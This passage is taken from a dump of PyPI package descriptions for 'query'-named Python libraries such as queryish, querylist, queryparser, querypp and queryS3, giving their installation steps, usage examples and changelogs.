andin_bulk. The result set can be sliced at arbitrary indices - these do not have to match the pagination supported by the underlying API.APIModelwill automatically make multiple API requests as required.The following attributes are available onAPIModel.Meta:base_url: The base URL of the API from where results can be fetched.pk_field_name: The name of the primary key field. Defaults to\"id\". Lookups on the field name\"pk\"will be mapped to this field.detail_url: A string template for the URL of a single object, such as\"https://demozoo.org/api/v1/parties/%s/\". If this is specified, lookups on the primary key and no other fields will be directed to this URL rather thanbase_url.fields: A list of field names defined in the API response that will be copied to attributes of the returned object.pagination_style: The style of pagination used by the API. Recognised values are\"page-number\"and\"offset-limit\"; all others (including the default ofNone) indicate no pagination.page_size: Required ifpagination_styleis\"page-number\"- the number of results per page returned by the API.page_query_param: The name of the URL query parameter used to specify the page number. Defaults to\"page\".offset_query_param: The name of the URL query parameter used to specify the offset. Defaults to\"offset\".limit_query_param: The name of the URL query parameter used to specify the limit. Defaults to\"limit\".ordering_query_param: The name of the URL query parameter used to specify the ordering. Defaults to\"ordering\".To accommodate APIs where the returned JSON does not map cleanly to the intended set of model attributes, the class methodsfrom_query_dataandfrom_individual_dataonAPIModelcan be overridden:classPokemon(APIModel):classMeta:base_url=\"https://pokeapi.co/api/v2/pokemon/\"detail_url=\"https://pokeapi.co/api/v2/pokemon/%s/\"fields=[\"id\",\"name\"]pagination_style=\"offset-limit\"verbose_name_plural=\"pokemon\"@classmethoddeffrom_query_data(cls,data):\"\"\"Given a record returned from the listing endpoint (base_url), return an instance of the model.\"\"\"# Records within the listing endpoint return a `url` field, from which we want to extract the IDreturncls(id=int(re.match(r'https://pokeapi.co/api/v2/pokemon/(\\d+)/',data['url']).group(1)),name=data['name'],)@classmethoddeffrom_individual_data(cls,data):\"\"\"Given a record returned from the detail endpoint (detail_url), return an instance of the model.\"\"\"returncls(id=data['id'],name=data['name'],)def__str__(self):returnself.nameCustomising the REST API queryset classTheobjectsattribute of anAPIModelsubclass is an instance ofqueryish.rest.APIQuerySetwhich initially consists of the complete set of records. As with Django's QuerySet, methods such asfilterreturn a new instance.It may be necessary to subclassAPIQuerySetand override methods in order to support certain API responses. For example, the base implementation expects unpaginated API endpoints to return a list as the top-level JSON object, and paginated API endpoints to return a dict with aresultsitem. If the API you are working with returns a different structure, you can override theget_results_from_responsemethod to extract the list of results from the response:fromqueryish.restimportAPIQuerySetclassTreeQuerySet(APIQuerySet):base_url=\"https://api.data.amsterdam.nl/v1/bomen/stamgegevens/\"pagination_style=\"page-number\"page_size=20http_headers={\"Accept\":\"application/hal+json\"}defget_results_from_response(self,response):returnresponse[\"_embedded\"][\"stamgegevens\"]APIQuerySetsubclasses can be instantiated independently of anAPIModel, but results will be returned as plain JSON values:>>>TreeQuerySet().filter(jaarVanAanleg=1986).first(){'_links':{'schema':'https://schemas.data.amsterdam.nl/datasets/bomen/dataset#stamgegevens','self':{'href':'https://api.data.amsterdam.nl/v1/bomen/stamgegevens/1101570/','title':'1101570','id':1101570},'gbdBuurt':{'href':'https://api.data.amsterdam.nl/v1/gebieden/buurten/03630980000211/','title':'03630980000211','identificatie':'03630980000211'}},'id':1101570,'gbdBuurtId':'03630980000211','geometrie':{'type':'Point','coordinates':[115162.72,485972.68]},'boomhoogteklasseActueel':'c. 9 tot 12 m.','jaarVanAanleg':1986,'soortnaam':\"Salix alba 'Chermesina'\",'stamdiameterklasse':'0,5 tot 1 m.','typeObject':'Gekandelaberde boom','typeSoortnaam':'Bomen','soortnaamKort':'Salix','soortnaamTop':'Wilg (Salix)'}This can be overridden by defining amodelattribute on the queryset, or overriding theget_instance/get_individual_instancemethods. To use a customised queryset with anAPIModel, define thebase_query_classattribute on the model class:classTree(APIModel):base_query_class=TreeQuerySetclassMeta:fields=[\"id\",\"geometrie\",\"boomhoogteklasseActueel\",\"jaarVanAanleg\",\"soortnaam\",\"soortnaamKort\"]# >>> Tree.objects.filter(jaarVanAanleg=1986).first()# Other data sourcesqueryishis not limited to REST APIs - the base classqueryish.Queryishcan be used to build a QuerySet-like API around any data source. At minimum, this requires defining arun_querymethod that returns an iterable of records that is filtered, ordered and sliced according to the queryset's attributes. For example, a queryset implementation that works from a simple in-memory list of objects might look like this:fromqueryishimportQueryishclassCountryQuerySet(Queryish):defrun_query(self):countries=[{\"code\":\"nl\",\"name\":\"Netherlands\"},{\"code\":\"de\",\"name\":\"Germany\"},{\"code\":\"fr\",\"name\":\"France\"},{\"code\":\"gb\",\"name\":\"United Kingdom\"},{\"code\":\"us\",\"name\":\"United States\"},]# Filter the list of countries by `self.filters` - a list of (key, value) tuplesfor(key,val)inself.filters:countries=[cforcincountriesifc[key]==val]# Sort the list of countries by `self.ordering` - a tuple of field namescountries.sort(key=lambdac:[c.get(field,None)forfieldinself.ordering])# Slice the list of countries by `self.offset` and `self.limit`. `offset` is always numeric# and defaults to 0 for an unsliced list; `limit` is either numeric or None (denoting no limit).returncountries[self.offset:self.offset+self.limitifself.limitelseNone]Subclasses will also typically override the methodrun_count, which returns the number of records in the queryset accounting for any filtering and slicing. If this is not overridden, the default implementation will callrun_queryand count the results."} +{"package": "querykit", "pacakge-description": "querykitA Wagtail app for handling queries. Please bear with us while we prepare more detailed documentation.Compatibilityquerykit' major.minor version number indicates the Wagtail release it is compatible with. Currently this is Wagtail 4.1.xInstallationInstall usingpip:pipinstallquerykitAddquerykitto yourINSTALLED_APPSsetting:INSTALLED_APPS=[# ...'querykit'# ...]"} +{"package": "querylib", "pacakge-description": "No description available on PyPI."} +{"package": "querylist", "pacakge-description": "# querylist[![Build Status](https://img.shields.io/travis/thomasw/querylist.svg)](https://travis-ci.org/thomasw/querylist)[![Coverage Status](https://img.shields.io/coveralls/thomasw/querylist.svg)](https://coveralls.io/r/thomasw/querylist)[![Latest Version](https://img.shields.io/pypi/v/querylist.svg)](https://pypi.python.org/pypi/querylist/)[![Downloads](https://img.shields.io/pypi/dm/querylist.svg)](https://pypi.python.org/pypi/querylist/)Sick of for loop + conditional soup when dealing with complicated lists?Querylist is here to help.This package provides a data structure called a QueryList, an extension ofPython's built in list data type that adds django ORM-eseque filtering,exclusion, and get methods. QueryLists allow developers to easily query andretrieve data from complex lists without the need for unnecessarily verboseiteration and selection cruft.The package also provides BetterDict, a backwards-compatible wrapper fordictionaries that enables dot lookups and assignment for key values.Take a look at the [completedocumentation](https://querylist.readthedocs.org/) for more information.## InstallationQuerylist can be installed like any other python package:> pip install querylistQuerylist is tested against Python 2.6, 2.7, 3.3, 3.4, and pypy.## Usage### BetterDictsBetterDicts wrap normal dicts. They have all of the same functionality onewould expect from a normal dict:>>> from querylist import BetterDict>>> src = {'foo': 'bar', 'items': True}>>> bd = BetterDict(src)>>> bd == srcTrue>>> bd['foo']'bar'>>> bd.items()[('items', True), ('foo', 'bar')]However, BetterDicts can also preform dot lookups and assignment of keyvalues!>>> bd.bar_time = True>>> bd.foo = 'meh'>>> bd.foo'meh'>>> bd.bar_timeTrue>>> bd['bar_time']TrueKey values that conflict with normal dict attributes are accessible via a`_bd_` attribute.>>> bd.items>>> bd._bd_.itemsTrue[More about BetterDicts >>](https://querylist.readthedocs.org/en/latest/betterdict.html)### QueryListsQueryLists work just like lists:>>> from querylist import QueryList>>> site_list = [{'url': 'http://site1.tld/','meta': {'keywords': ['Mustard', 'kittens'],'description': 'My cool site'},'published': True,'id': 1,'name': 'Site 1'}, {'url': 'http://site2.tld/','meta': {'keywords': ['Catsup', 'dogs'],'description': 'My cool site'},'published': True,'id': 2,'name': 'SitE 2'}, {'url': 'http://site3.tld/','meta': {'keywords': ['Mustard', 'kittens'],'description': 'My cool site'},'published': False,'id': 3,'name': 'Site 3'}]>>> ql = QueryList(site_list)>>> ql == site_listTrueThey also let developers, exclude objects that don't match criteria via fieldlookups or filter the QueryList to only the objects that do match a providedcriteria:>>> ql.exclude(published=True)[{'url': 'http://site3.tld/', 'meta': {'keywords': ['Mustard', 'kittens'], 'description': 'My cool site'}, 'id': 3, 'name': 'Site 3', 'published': False}]>>> ql.filter(published=True).exclude(meta__keywords__contains='Catsup')[{'url': 'http://site1.tld/', 'meta': {'keywords': ['Mustard', 'kittens'], 'description': 'My cool site'}, 'id': 1, 'name': 'Site 1', 'published': True}]And finally, they let developers retrieve specific objects with the getmethod:>>> ql.get(id=2){'url': 'http://site1.tld/', 'meta': {'keywords': ['Mustard', 'kittens'], 'description': 'My cool site'}, 'id': 2, 'name': 'Site 1', 'published': True}By default, QueryLists work exclusively with lists of dictionaries. This isachieved partly by converting the member dicts to BetterDicts oninstantiation. QueryLists also supports lists of any objects that support dotlookups. `QueryList.__init__()` has parameters that let users easily convertlists of dictionaries to custom objects. Consider the `site_list` exampleabove: instead of just letting the QueryList default to a BetterDict, we couldinstantiate it with a custom Site class that provides methods for publishing,unpublishing, and deleting sites. That would then allow us to write code likethe following, which publishes all unpublished sites:>>> from site_api import Site>>> ql = QueryList(site_list, wrap=Site)>>> [x.publish() for x in ql.exclude(published=True)][More about QueryLists >>](https://querylist.readthedocs.org/en/latest/querylist.html)## Contributing1. Fork the repo and then clone it locally.2. Install the development requirements: `pip install -r requirements.txt` (use `requirements26.txt` for python 2.6)3. Use [testtube](https://github.com/thomasw/testtube/)'s `stir` command(installed via #2) to monitor the project directory for changes andautomatically run the test suite.4. Make changes and submit a pull request.At the moment, Querylist has great test coverage. Please do your part to helpkeep it that way by writing tests whenever you add or change code.## Everything elseCopyright (c) [Thomas Welfley](http://welfley.me). See[LICENSE](https://github.com/thomasw/querylist/blob/master/LICENSE) fordetails."} +{"package": "querylm", "pacakge-description": "No description available on PyPI."} +{"package": "query-log", "pacakge-description": "No description available on PyPI."} +{"package": "query-log-tracer", "pacakge-description": "query-log-tracerA Python tool/library that traces a value in MySQL general logs.UsageSet up$ pip install query-log-tracerExample usage./tests/files/general-query.logis a sample query log file of MySQL 5.7. Most of the queries are generated by EC-CUBE 4.$ query-log-tracer --log-file=./tests/files/general-query.log --target-table=dtb_customer --target-column=point --filter-column=id --filter-value=1\n=== Searching in ./tests/files/general-query.log ===\n\n2020-02-02T07:19:51.127168Z dtb_customer.point (id = 1) is set: '0'\n2020-02-02T07:20:19.927027Z dtb_customer.point (id = 1) is set: '0'\n2020-02-02T07:20:26.901577Z dtb_customer.point (id = 1) is set: '100'\n2020-02-02T07:20:31.034901Z dtb_customer.point (id = 1) is set: '1000'\n2020-02-02T07:20:39.396236Z dtb_customer.point (id = 1) is set: '2000'\n2020-02-02T07:20:46.379143Z dtb_customer.point (id = 1) is set: '0'\n2020-02-02T07:26:37.443522Z dtb_customer.point (id = 1) is set: '0'\n2020-02-02T07:26:55.216881Z dtb_customer.point (id = 1) is set: '0'\n2020-02-02T07:27:13.008757Z dtb_customer.point (id = 1) is set: '50'\n2020-02-02T07:28:01.128957Z dtb_customer.point (id = 1) is set: '0'\n2020-02-02T07:28:09.995354Z dtb_customer.point (id = 1) is set: '0'\n2020-02-02T07:28:14.172518Z dtb_customer.point (id = 1) is set: '27'\n2020-02-02T07:33:41.745400Z dtb_customer.point (id = 1) changes: +500For EC-CUBE 2, try the following command.$ query-log-tracer --log-dir=your-directory --target-table=dtb_customer --target-column=point --filter-column=customer_id --filter-value=1"} +{"package": "querymagic", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "query-maker-ryazantseff", "pacakge-description": "Example PackageThis is a simple example package. You can useGithub-flavored Markdownto write your content."} +{"package": "querymaster", "pacakge-description": "Query MasterQueryMaster is a Python package that enables the use of multiple databases in one place."} +{"package": "querynator", "pacakge-description": "Python package to query cancer variant databasesFree software: MIT licenseDocumentation:https://querynator.readthedocs.io.FeaturesCommand-line tool to query thecancergenomeinterpretervia its REST APICommand-line tool to query theClinical Interpretation of Variants in Cancer (CIViC) KnowledgebaseusingCIViCpyCreditsThis package uses the cancergenomeinterpreter.org REST API for data retrieval.Mui\u00f1os, F., Mart\u00ednez-Jim\u00e9nez, F., Pich, O. et al. In silico saturation mutagenesis of cancer genes. Nature 596, 428\u2013432 (2021).https://doi.org/10.1038/s41586-021-03771-1Tamborero, D. Rubio-Perez, C., Deu-Pons, J. et al., Cancer Genome Interpreter annotates the biological and clinical relevance of tumor alterations. Genome Medicine 10, (2018). doi:https://doi.org/10.1101/140475This package uses the CIViCpy package for data retrieval from the CIViC database.Wagner, Alex H., et al. \u201cCIViCpy: a python software development and analysis toolkit for the CIViC knowledgebase.\u201d JCO Clinical Cancer Informatics 4 (2020): 245-253. doi:https://doi.org/10.1200/CCI.19.00127Griffith, M., Spies, N., Krysiak, K. et al. CIViC is a community knowledgebase for expert crowdsourcing the clinical interpretation of variants in cancer. Nat Genet 49, 170\u2013174 (2017). doi:https://doi.org/10.1038/ng.3774This package was created withCookiecutterand theaudreyr/cookiecutter-pypackageproject template.Changelog0.4.1 - Stormy Saturn (2023-06-13)AddedFixedBug fixes to include all evidence of CIViCDependenciesDeprecated0.4.0 - Stormy Saturn (2023-05-31)AddedFixedFixed functionality for new CGI file structureFixed case when CIViC has no hitsDependenciesDeprecated0.3.3 - Iron Mercury (2023-05-05)AddedFixedFixed API docsDependenciesDeprecated0.3.2 - Iron Mercury (2023-05-05)AddedFixedFixed version bumpDependenciesDeprecated0.3.1 - Iron Mercury (2023-05-05)AddedFixedFixed import of site-packages in setup.pyDependenciesDeprecated0.3.0 - Iron Mercury (2023-05-04)AddedAdded functionality to combine the results of the Knowledgebases in an HTML reportAdded possibility to have non-numerical chromosome columns in the input vcfAdded deletion of CGI jobs from CGI Server after completionFixedDependenciesDeprecated0.2.2 - Sour Venus (2023-03-16)AddedOptional VEP annotation based filteringAdditional metadataUsage of pyVCF3 to read vcf filesQuerynator ID added for filtered vcf filesAll possible reference genomes for CIViCFixedDependenciesDeprecatedUsage of pysam to read vcf files0.2.1 - Sour Venus (2023-02-16)AddedFixedRendering API docsDependenciesDeprecated0.2.0 - Sour Venus (2023-02-07)AddedAdded functionality to query the Clinical Interpretation of Variants in Cancer (CIViC) KnowledgebaseAdded possibility to query bgzipped filesFixedDependenciesDeprecated0.1.3 - Diamond Neptune (2022-11-21)AddedFixedFix including moduleDependenciesDeprecated0.1.2 - Diamond Neptune (2022-11-18)AddedFixedFix installing requirementsDependenciesDeprecated0.1.1 - Methane Titan (2022-11-18)AddedFixedGithub Actions publishing to PyPIFix docsDependenciesDeprecated0.1.0 - initial release (2022-11-18)AddedFirst release on PyPICreated the package template with cookiecutterFunctions to query the cancergenomeinterpreter REST APIFixedDependenciesDeprecated"} +{"package": "queryones", "pacakge-description": "API ReferenceimportfromqueryonesimportQueryfromtablevalueimportManager,TableValueUsage1. simple query with paramsdata=(('oleg','Asbest',2,1),('ivan','Asbest',1,2),('nastya','Krasnodar',0,2),('Max','Asbest',1,2),('Even','Krasnodar',1,2),('Rob','Krasnodar',1,2),('Mob','Ekaterinburg',1,2),('Dick','Ekaterinburg',1,2),('Cheize','Krasnodar',1,2),('Longard','Ekaterinburg',1,2),)manager=Manager()table1=TableValue(manager=manager,table_name='first_table')table1.columns.add('name')table1.columns.add('city')table1.columns.add('children_count',TableValue.Types.INTEGER)table1.columns.add('pets_count',TableValue.Types.INTEGER)table1.new_bulk_insert(data)query=Query(manager=manager)query.text='''select'Amigo' as name,&city as city,&children_count as children_count,&pets_count as pets_count'''query.set_parameter('city','London')query.set_parameter('children_count',3)query.set_parameter('pets_count',0)result=query.execute()print(result.get_data())Output[('Amigo', 'London', 3, 0)]2. multi queryquery.text='''select'Amigo' as name,&city as city,&children_count as children_count,&pets_count as pets_count;select'chili' as come_hot'''result=query.execute()print(result.get_data())Output[('chili',)]3. multi query with multi resultquery.text='''select'Amigo' as name,&city as city,&children_count as children_count,&pets_count as pets_count;select'chili' as some_hot'''result=query.execute_pack()print(len(result))print(result[0].get_data())print(result[1].get_data())Output2[('Amigo', 'London', 3, 0)][('chili',)]4. Using TableValue object in queryquery.text='''selecttable1.name as name,table1.city as cityinto tmp_doublefrom &table1 as table1;selecttable1.name,table1.cityfrom tmp_double as table1union allselectname,cityfrom first_table'''query.set_parameter('table1',table1)# table1 - TableValue objectresult=query.execute()foriinresult.get_data(sort='name'):print(i)Output('Cheize', 'Krasnodar')\n('Cheize', 'Krasnodar')\n('Dick', 'Ekaterinburg')\n('Dick', 'Ekaterinburg')\n('Even', 'Krasnodar')\n('Even', 'Krasnodar')\n('Longard', 'Ekaterinburg')\n('Longard', 'Ekaterinburg')\n('Max', 'Asbest')\n('Max', 'Asbest')\n('Mob', 'Ekaterinburg')\n('Mob', 'Ekaterinburg')\n('Rob', 'Krasnodar')\n('Rob', 'Krasnodar')\n('ivan', 'Asbest')\n('ivan', 'Asbest')\n('nastya', 'Krasnodar')\n('nastya', 'Krasnodar')\n('oleg', 'Asbest')\n('oleg', 'Asbest')5. manager tablesprint(manager.tables.keys())print('===deleting===')print(manager.exists('first_table'))manager.drop_table('first_table')print(manager.exists('first_table'))print('===deleting not exist table===')print(manager.exists('test_table'))manager.drop_table('test_table')Outputdict_keys(['first_table', 'ResultTable0', 'ResultTable1', 'ResultTable2', 'ResultTable3', 'ResultTable4'])\n\n===deleting===\nTrue\nFalse\n\n===deleting not exist table===\nFalse\nNameError: Table [test_table] is not exists.6. Connect to earlier created tablemanager=Manager(os.getcwd()+os.sep+'data.db')ifnotmanager.exists('first_table'):table1=TableValue(manager=manager,table_name='first_table')table1.columns.add('name')table1.columns.add('city')table1.columns.add('children_count',TableValue.Types.INTEGER)table1.columns.add('pets_count',TableValue.Types.INTEGER)table1.new_bulk_insert(data)else:table1=manager.get('first_table')row1=table1.get_rows(limit=1)[0]print(row1)Output[id:1], [name:oleg], [city:Asbest], [children_count:2], [pets_count:1]"} +{"package": "query-package-documentation", "pacakge-description": "Query Package DocumentationInstallation:PyPIDocumentation:Read the Docs"} +{"package": "queryparams-liberdade", "pacakge-description": "Parse query parameters as objects to be used in Python"} +{"package": "query-parser", "pacakge-description": "qs-parserInstallFor use this lib with poetry :poetryaddquery-parserFor use this lib with pip :pipinstallquery-parserUsagefromquery_parser.parserimportparse_query_stringprint(parse_query_string(\"a=1&b=2&c=3&b[]=4&b[]=5&b[other]=6\"))# {'a': '1', 'b': {'0': '2', '1': '4', '2': '5', 'other': '6'}, 'c': '3'}"} +{"package": "queryparser-python2", "pacakge-description": "Tool for parsing and processing MySQL and ADQL SELECT queriesDesigned to be used in conjunction withdjango-daiqurias a query processing backend but it can be easily used as a stand-alone tool\nor integrated into another project.InstallationThe easiest way to install the package is by using the pip tool:pipinstallqueryparser-python3or if you are using an older version (2.7) of pythonpipinstallqueryparser-python2Alternatively, you can clone the repository and install it from there.\nHowever, this step also requires generating the parser which is a slighly\nmore elaborate process (see below).Generating the parser from the git repositoryTo generate the parsers you needpython(either 2 or 3),javaabove version\n7, andantlr4(antlr-4.*-complete.jarhas to be installed inside the/usr/local/lib/or/usr/local/bin/directories).After cloning the project runmakeand alibdirectory will be created with the complete source for python2\nand python3. After that runpythonsetup.pyinstallto install the generated parser in your virtual environment.Parsing MySQLParsing and processing of MySQL queries can be done by creating an instance\nof theMySQLQueryProcessorclassfromqueryparser.mysqlimportMySQLQueryProcessorqp=MySQLQueryProcessor()feeding it a MySQL querysql=\"SELECT a FROM db.tab;\"qp.set_query(sql)and running it withqp.process_query()After the processing, the processor objectqpwill include tables, columns,\nfunctions, and keywords used in the query or will raise aQuerySyntaxErrorif there are any syntax errors in the query.Alternatively, passing the query at initialization automatically processes it.Translating ADQLTranslation of ADQL queries is done similarly by first creating an instance of\ntheADQLQueryTranslatorclassfromqueryparser.adqlimportADQLQueryTranslatoradql=\"SELECT TOP 100 POINT('ICRS', ra, de) FROM db.tab;\"adt=ADQLQueryTranslator(adql)and callingadt.to_mysql()which returns a translated string representing a valid MySQL query if\nthe ADQL query had no errors. The MySQL query can then be parsed with theMySQLQueryProcessorin the same way as shown above.TestingFirst, installpytestpipinstallpytestthen run the test suite for a version of python you would like to test withpytestlib/python2pytestlib/python3"} +{"package": "queryparser-python3", "pacakge-description": "queryparserTool for parsing and processing of MySQL/PostgreSQL and translation of\nADQL SELECT-like queriesDesigned to be used in conjunction withdjango-daiqurias a query processing backend but it can be easily used as a stand-alone tool\nor integrated into another project.InstallationThe easiest way to install the package is by using the pip tool:pipinstallqueryparser-python3Alternatively, you can clone the repository and install it from there.\nHowever, this step also requires generating the parser which is a slightly\nmore elaborate process (see below).Generating the parser from the git repositoryTo generate the parsers you needpython3,javaabove version\n7, andantlr4(antlr-4.*-complete.jarhas to be installed inside the/usr/local/lib/or/usr/local/bin/directories).After cloning the project runmakeand alibdirectory will be created. After that, runpythonsetup.pyinstallto install the generated parser in your virtual environment.Parsing MySQL and PostgreSQLParsing and processing of MySQL queries can be done by creating an instance\nof theMySQLQueryProcessorclassfromqueryparser.mysqlimportMySQLQueryProcessorqp=MySQLQueryProcessor()feeding it a MySQL querysql=\"SELECT a FROM db.tab;\"qp.set_query(sql)and running it withqp.process_query()After the processing is completed, the processor objectqpwill include\ntables, columns, functions, and keywords used in the query or will raise aQuerySyntaxErrorif there are any syntax errors in the query.Alternatively, passing the query at initialization automatically processes it.PostgreSQL parsing is very similar to MySQL, except it requires importing\nthePostgreSQLProcessorclass:fromqueryparser.postgresqlimportPostgreSQLQueryProcessorqp=PostgreSQLQueryProcessor()The rest of the functionality remains the same.Translating ADQLTranslation of ADQL queries is done similarly by first creating an instance of\ntheADQLQueryTranslatorclassfromqueryparser.adqlimportADQLQueryTranslatoradql=\"SELECT TOP 100 POINT('ICRS', ra, de) FROM db.tab;\"adt=ADQLQueryTranslator(adql)and callingadt.to_mysql()which returns a translated string representing a valid MySQL query if\nthe ADQL query had no errors. The MySQL query can then be parsed with theMySQLQueryProcessorin the same way as shown above.TestingFirst, installpytestpipinstallpytestthen run the test suite for a version of python you would like to test withpytestlib/More elaborate testing procedures can be found in the development notes."} +{"package": "query-phenomizer", "pacakge-description": "query_phenomizerA small module for querying thephenomizer toolwith HPO-terms.INFO!!!From 16/2-16 phenomizer demands a password and username when using the service in this way.\nRequest login credentials fromsebastian.koehler@charite.deInstallationpip install query_phenomizerorgit clone https://github.com/moonso/query_phenomizer.git\ncd query_phenomizer\npip install --editable .##Usage##query_phenomizer HP:0001623 HP:0002465 --output phenitypes.txtUser can check if hpo terms exist by using the flag-c/--check_terms.query_phenomizer HP:0001623 HP:02345555 --check_terms -vPrints that HP:02345555 does not exist.For more info runquery_phenomizer --help"} +{"package": "querypool", "pacakge-description": "querypoolExecution pool with caching and early return for python.Query pools let a query run in the background when it doesn't return\nwithin a given timeout. In that case the result of the previous query\nis returned or raised. If there is no result, the default value is returned.import requests\nfrom querypool.pools import CooperativeQueryPool\n\npool = CooperativeQueryPool(timeout=0.001)\nurl = \"https://jsonplaceholder.typicode.com/photos\"\n\n# Returns None because the query times out.\nresponse = pool.execute(requests.get, args=(url,), default=None)\nassert response is None\n\n# Increase the timeout to let the query finish.\n# The same function with the same arguments is still running so\n# all this does is wait for the result of the previous call.\nresponse = pool.execute(requests.get, args=(url,), default=None, timeout=3)\nresponse.raise_for_status()\n\n# Returns the previous result because the query times out.\nresponse = pool.execute(requests.get, args=(url,), default=None)\nresponse.raise_for_status()Documentationhttps://querypool.readthedocs.io/"} +{"package": "query-postgresql", "pacakge-description": "No description available on PyPI."} +{"package": "querypp", "pacakge-description": "queryppDeprecation Noticequerypp has been deprecated in favor of vanilla jinja2. After porting it to jinja2, I realized that none of querypp\nwas actually necessary.Migrating docs here.v0.0.3is the last version that doesn't use jinja2, in case\nyou want a more lightweight version.querypp is a SQL query[1] templating system based onjinja2.[1]: Although it is trivially adapted to other languages, as the only SQL-specific assumption is the line comment\nsyntax.Take an example:-- :query users\nSELECT *\nFROM users\n-- :qblock profiles\n\tLEFT JOIN profiles USING (user_id)\n\t-- :block login_history\n\t\tLEFT JOIN login_history USING (profile_id)\n\t-- :endqblock\n-- :endqblock\n-- :qblock user_id WHERE user_id = $1\n-- :endqueryA Query template can be called:with no block names to return the query without any blockswith one or more block names to return the query with only those block names.In this case,q('profiles', 'user_id')would return the query with thelogin_historyJOIN removed.Additionally, anyjinja2 templating features,\nsuch as variables and macro functions, can be used, using either the line syntax (e.g.-- :include 'foo.sql')\nor the block syntax (e.g.{% if x == 1 %}).Usageenv = querypp.QueryEnvironment('sql/')\nqueries = env.get_template('queries.sql') # opens sql/queries.sql\ndb.execute(queries.users('login_history', 'user_id'), user_id)MotivationAfter moving all my SQL queries to separate files,\nI noticed that I was duplicating some of them except for one extra clause.\nI created this to allow me to deduplicate such queries.LicensePublic domain, seeCOPYING"} +{"package": "query-prom", "pacakge-description": "QueryPrometheusThis is a simple library to ease querying prometheus in python.Getting StartedTo get up and running, you can either clone the repo and go from there. Or it should be pip installable.git clone git@github.com:jpavlav/QueryPrometheus.git\ncd QueryPrometheus\npip install -r requirements.txtThe advantage to a pip install is the required packages are included.pip install git+https://github.com/jpavlav/QueryPrometheus.gitPrerequisitesPython3Built WithPython3- Beautiful language.AuthorsJustin Palmer-Urrverything-MeAcknowledgmentsKenneth Reitz ->setup- Thanks!Kamori ->Cool Guy- Thanks to you as well!"} +{"package": "query-prometheus", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "query-pts", "pacakge-description": "Query_ptsA package for calculate barycentric coordinates in the tetrahedras.DependencyThis package relies oncuda 10, which has been tested onpytorch 1.7.1andcuda 10.2.Usageimport torch\nimport query_pts\ntet_idx, barycentric = query_pts.cal_barycentric(q_pts, verts, tets, indexes, 4)\nArgs:\n q_pts (torch.tensor): the query points, [Nq,3]\n verts (torch.tensor): the vertices tethedra, [NV,3]\n tets (torch.tensor): the vertex index of each tet, [NT,4]\n K (int): the nearest neighbors for searching to accelerate query\n use_cuda (bool, optional): _description_. Defaults to True.\nReturn:\n tet_idx (torch.tensor): the tet which containing the query point, [Nq,]\n barycentric (torch.tensor): corresponding barycentric coordinates, [Nq,4]If a point is not in any tetrahedras, the tet idx is set to-1and barycentric coordinates are set to[0,0,0,0]."} +{"package": "query_quiver", "pacakge-description": "QueryQuiverQueryQuiver estimates your interests based on your past Google Chrome search history and suggests technical article ideas that you might be comfortable writing about.Installpipinstallgit+https://github.com/marutaku/QueryQuiverUsagePlease close Google Chrome before using this tool.The tool references the SQLite database used internally by Google Chrome.While using GoogleChrome, this SQLite database will be locked and an error will occur.queryquivergenerateOptionsqueryquivergenerate--help\n\nNAMEqueryquivergenerate-GenerateideaoftecharticlesfromGoogleChromehistorySYNOPSISqueryquivergenerate\n\nDESCRIPTIONGenerateideaoftecharticlesfromGoogleChromehistoryFLAGS-q,--query_history_limit=QUERY_HISTORY_LIMITType:intDefault:20-n,--number_of_ideas=NUMBER_OF_IDEASType:intDefault:5-c,--chrome_history_path=CHROME_HISTORY_PATHType:Optional[str|None]Default:None-o,--openai_api_key=OPENAI_API_KEYType:Optional[str|None]Default:None-d,--debug=DEBUGType:boolDefault:False-l,--language=LANGUAGEType:strDefault:'en'-u,--use_gpt4=USE_GPT4Type:boolDefault:FalseDeveloper informationsetupmakesetuptestmaketestlintmakelintformatmakeformat"} +{"package": "query_reports", "pacakge-description": "Query Reports creates reports based on the django queryset object.## Using the pretty bootstrap templateIf you want to use a pretty bootstrap template instead of the normal sitebase.htmlyou can overridequery_reports/base.htmland just put this in the file{% extends \u201cquery_reports/bootstrap_base.html\u201d %}## Running the TestsYou can run the tests with viapython setup.py testorpython run_tests.py"} +{"package": "query-rewritor", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "queryrunner", "pacakge-description": "Query-RunnerCLI tool to help with running queries.QuickstartPass through asqlalchemy DB URLand a query to run a query and export to file.\n(You may need the relevant DB drivers installed also.)python-mqueryrunnershow\"sqlite:///\"\"SELECT 'Val' as col1\"python-mqueryrunnerto-csv\"sqlite:///\"\"SELECT 'Val' as col1\"\"output.csv\"You can also use an environment variable to contain your connection string, and a file to contain your SQL query.DB_URI=\"sqlite:///\"#example-query.sqlSELECT'Val'ascol1python-mqueryrunnerto-csv\"DB_URI\"\"example-query.sql\"\"output.csv\"Query ParametersYou can pass query parameters as extra CLI options, but this only works for strings.So this will work:python-mqueryrunnershow\"sqlite:///\"\"SELECT '5' as col1 WHERE col1=:val\"--val5python-mqueryrunnershow\"sqlite:///\"\"SELECT 5 as col1 WHERE CAST(col1 as text)=:val\"--val5But this will not:python-mqueryrunnershow\"sqlite:///\"\"SELECT 5 as col1 WHERE col1=:val\"--val5"} +{"package": "queryS3", "pacakge-description": "queryS3 APIIntroductionThis API enable users to query images from AI Testing database, currently implementing on AWS S3, with natural English description. A string of keywords also works if users want to put more restrictions onto the picture. The main functionality of this API can be treated in a blackbox manner. That it takes is a string of description and returns a list of S3 object URL of the images.Dependencies- nltk: Natural Language Toolkitgithub link- pandas: powerful Python data analysis toolkitgithub linkInstallationpipinstallqueryS3Example usagefromqueryS3importQS3qs=QS3.QS3()# this line will retrieve all images that have single husky# the return type will be a python listqs.query('single husky')API detailsQS.query(in_q: str): -> List[str]: \"query\" is a function in the class QS. It takes a english description(or a string of keywords needed) as input and returns a list of S3 object URL stringsQS.set_label_list(self, label_list: List[str]): This function will replace the original label list in the database with a new list of labels only for this object instance of QS. By doing so, the whole \"extract label from description\" and \"label matching search\" process will then based on the new set of labels. Duplicated labels will be removed.QS.add_label_list(self, label_list: List[str]): This function will append the label list with the newly added list. Duplicated labels will be removed.AuthorQiao Liu,Everette LiCopyrightCopyright \u00a9 2020, The AITestResourceLibrary Authority. Released under the MIT License."} +{"package": "querySDSS", "pacakge-description": "QuerySDSS is a Python script that utilizes the Astropy and Astroquery\nlibraries to retrieve data from the Sloan Digital Sky Survey (SDSS) Data\nRelease 18 (DR18). This script fetches information about celestial\nobjects including their nature (galaxy, star, quasar), redshift,\ncoordinates, positions, and flux 